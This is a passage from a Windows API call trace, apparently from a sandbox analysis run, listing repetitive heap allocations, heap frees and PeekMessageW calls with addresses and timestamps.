(HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a010 [0071.644] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766918 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766918 | out: hHeap=0x650000) returned 1 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fc8 | out: hHeap=0x650000) returned 1 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769ff8 | out: hHeap=0x650000) returned 1 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a010 | out: hHeap=0x650000) returned 1 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7599b0 | out: hHeap=0x650000) returned 1 [0071.644] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766908 | out: hHeap=0x650000) returned 1 [0071.645] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x7599b0 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a010 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766908 [0071.645] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a010 | out: hHeap=0x650000) returned 1 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x7599d8 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a010 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769ff8 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766918 [0071.645] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769ff8 | out: hHeap=0x650000) returned 1 [0071.645] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766918 | out: hHeap=0x650000) returned 1 [0071.645] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759a00 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769ff8 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766918 [0071.645] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769ff8 | out: hHeap=0x650000) returned 1 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759a28 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769ff8 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fc8 [0071.645] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766928 [0071.645] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fc8 | out: hHeap=0x650000) returned 1 [0071.645] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766928 | out: hHeap=0x650000) returned 1 [0071.646] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759a50 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fc8 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766928 [0071.646] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x769fc8 | out: hHeap=0x650000) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759a78 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x769fc8 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a028 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766938 [0071.646] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a028 | out: hHeap=0x650000) returned 1 [0071.646] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766938 | out: hHeap=0x650000) returned 1 [0071.646] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759aa0 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a028 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766938 [0071.646] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a028 | out: hHeap=0x650000) returned 1 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759ac8 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a028 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a040 [0071.646] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766948 [0071.646] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a040 | out: hHeap=0x650000) returned 1 [0071.646] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766948 | out: hHeap=0x650000) returned 1 [0071.647] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759af0 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a040 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766948 [0071.647] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a040 | out: hHeap=0x650000) returned 1 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770ac8 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a040 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a058 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766958 [0071.647] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a058 | out: hHeap=0x650000) returned 1 [0071.647] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766958 | out: hHeap=0x650000) returned 1 [0071.647] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759b18 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a058 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766958 [0071.647] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a058 | out: hHeap=0x650000) returned 1 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770b00 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a058 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a070 [0071.647] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766968 [0071.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a070 | out: hHeap=0x650000) returned 1 [0071.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766968 | out: hHeap=0x650000) returned 1 [0071.648] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759b40 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a070 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766968 [0071.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a070 | out: hHeap=0x650000) returned 1 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770b38 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a070 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a088 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766978 [0071.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a088 | out: hHeap=0x650000) returned 1 [0071.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766978 | out: hHeap=0x650000) returned 1 [0071.648] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759b68 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a088 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766978 [0071.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a088 | out: hHeap=0x650000) returned 1 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770b70 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a088 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0a0 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766988 [0071.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a0a0 | out: hHeap=0x650000) returned 1 [0071.648] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766988 | out: hHeap=0x650000) returned 1 [0071.648] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.648] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759b90 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0a0 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766988 [0071.649] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a0a0 | out: hHeap=0x650000) returned 1 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b108 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0a0 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0b8 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766998 [0071.649] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a0b8 | out: hHeap=0x650000) returned 1 [0071.649] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766998 | out: hHeap=0x650000) returned 1 [0071.649] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759bb8 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0b8 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766998 [0071.649] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a0b8 | out: hHeap=0x650000) returned 1 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770ba8 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0b8 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0d0 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7669a8 [0071.649] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a0d0 | out: hHeap=0x650000) returned 1 [0071.649] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7669a8 | out: hHeap=0x650000) returned 1 [0071.649] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759be0 [0071.649] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0d0 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7669a8 [0071.650] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a0d0 | out: hHeap=0x650000) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770be0 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0d0 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0e8 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7669b8 [0071.650] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a0e8 | out: hHeap=0x650000) returned 1 [0071.650] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7669b8 | out: hHeap=0x650000) returned 1 [0071.650] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759c08 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0e8 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7669b8 [0071.650] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a0e8 | out: hHeap=0x650000) returned 1 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770c18 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a0e8 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a100 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7669c8 [0071.650] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a100 | out: hHeap=0x650000) returned 1 [0071.650] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7669c8 | out: hHeap=0x650000) returned 1 [0071.650] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759c30 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a100 [0071.650] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7669c8 [0071.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a100 | out: hHeap=0x650000) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b270 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a100 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a118 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7669d8 [0071.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a118 | out: hHeap=0x650000) returned 1 [0071.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x650000) returned 1 [0071.651] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759c58 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a118 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7669d8 [0071.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a118 | out: hHeap=0x650000) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b2b8 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a118 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a130 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7669e8 [0071.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a130 | out: hHeap=0x650000) returned 1 [0071.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7669e8 | out: hHeap=0x650000) returned 1 [0071.651] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759c80 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a130 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7669e8 [0071.651] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a130 | out: hHeap=0x650000) returned 1 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b300 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a130 [0071.651] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a148 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x7669f8 [0071.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a148 | out: hHeap=0x650000) returned 1 [0071.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7669f8 | out: hHeap=0x650000) returned 1 [0071.652] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759ca8 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a148 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x7669f8 [0071.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a148 | out: hHeap=0x650000) returned 1 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b348 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a148 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a160 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766a08 [0071.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a160 | out: hHeap=0x650000) returned 1 [0071.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a08 | out: hHeap=0x650000) returned 1 [0071.652] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759cd0 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a160 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766a08 [0071.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a160 | out: hHeap=0x650000) returned 1 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x770c50 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a160 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a178 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766a18 [0071.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a178 | out: hHeap=0x650000) returned 1 [0071.652] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a18 | out: hHeap=0x650000) returned 1 [0071.652] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.652] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759cf8 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a178 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766a18 [0071.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a178 | out: hHeap=0x650000) returned 1 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d30b8 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a178 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a190 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766a28 [0071.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a190 | out: hHeap=0x650000) returned 1 [0071.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a28 | out: hHeap=0x650000) returned 1 [0071.653] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759d20 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a190 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x766a28 [0071.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a190 | out: hHeap=0x650000) returned 1 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b390 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a190 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a1a8 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x766a38 [0071.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1a8 | out: hHeap=0x650000) returned 1 [0071.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a38 | out: hHeap=0x650000) returned 1 [0071.653] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x759d48 [0071.653] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a1a8 [0071.653] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1a8 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1c0 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a68 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a58 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1c0 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x759d70 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a48 | out: hHeap=0x650000) returned 1 [0071.654] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1c0 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1d8 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a58 | out: hHeap=0x650000) returned 1 [0071.654] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1d8 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1f0 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a68 | out: hHeap=0x650000) returned 1 [0071.654] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a1f0 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a208 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a78 | out: hHeap=0x650000) returned 1 [0071.654] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a220 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a238 | out: hHeap=0x650000) returned 1 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x766a88 | out: hHeap=0x650000) returned 1 [0071.654] PeekMessageW (in: lpMsg=0x61f784, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f784) returned 0 [0071.654] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a238 | out: hHeap=0x650000) returned 1 